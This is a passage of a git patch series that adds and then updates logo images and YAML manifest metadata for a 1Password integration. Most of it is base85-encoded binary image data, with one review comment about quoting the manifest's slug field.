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 literal 0 HcmV?d00001 diff --git a/1Password/_meta/manifest.yml b/1Password/_meta/manifest.yml new file mode 100644 index 000000000..7a2995595 --- /dev/null +++ b/1Password/_meta/manifest.yml @@ -0,0 +1,5 @@ +uuid: c938db6f-be6c-425c-8ea2-eab1ff63bc83 +name: 1Password +slug: "1password" +description: >- + 1Password is a password management company that provides secure solutions for storing and managing passwords and sensitive information. Its services are designed for both individuals and teams to ensure online security and simplify credential management. From 932d92cdc0497dc18a0b15d027437e87074b7e96 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 17 Sep 2024 12:08:17 +0300 Subject: [PATCH 041/317] Fixes and improvements --- 1Password/1password-epm/_meta/logo.png | Bin 11824 -> 28013 bytes 1Password/1password-epm/_meta/manifest.yml | 2 +- 1Password/_meta/logo.png | Bin 11824 -> 28013 bytes 1Password/_meta/manifest.yml | 2 +- 4 files changed, 2 insertions(+), 2 deletions(-) 
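Review bot: In the new 1Password/_meta/manifest.yml hunk, `slug: "1password"` is the only quoted scalar in the file, while the sibling manifest at 1Password/1password-epm/_meta/manifest.yml (visible in the following commit) writes the same field unquoted as `slug: 1password-epm`. The quotes are not required here, since a plain scalar containing letters is read as a string anyway, so `slug: 1password` would keep the two manifests in the same style. If the quoting is deliberate (for example to guard against a slug that could parse as a number), a short comment above the line stating that would stop a later cleanup from removing it.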
diff --git a/1Password/1password-epm/_meta/logo.png b/1Password/1password-epm/_meta/logo.png index d8fbd396e5dd798f4530be439b902acae10c5f19..893464ee20a2839903579d283f002b6df4858434 100644 GIT binary patch literal 28013 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

jn5s{7ZDGyJMyjeW)A;ZBmOW36 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 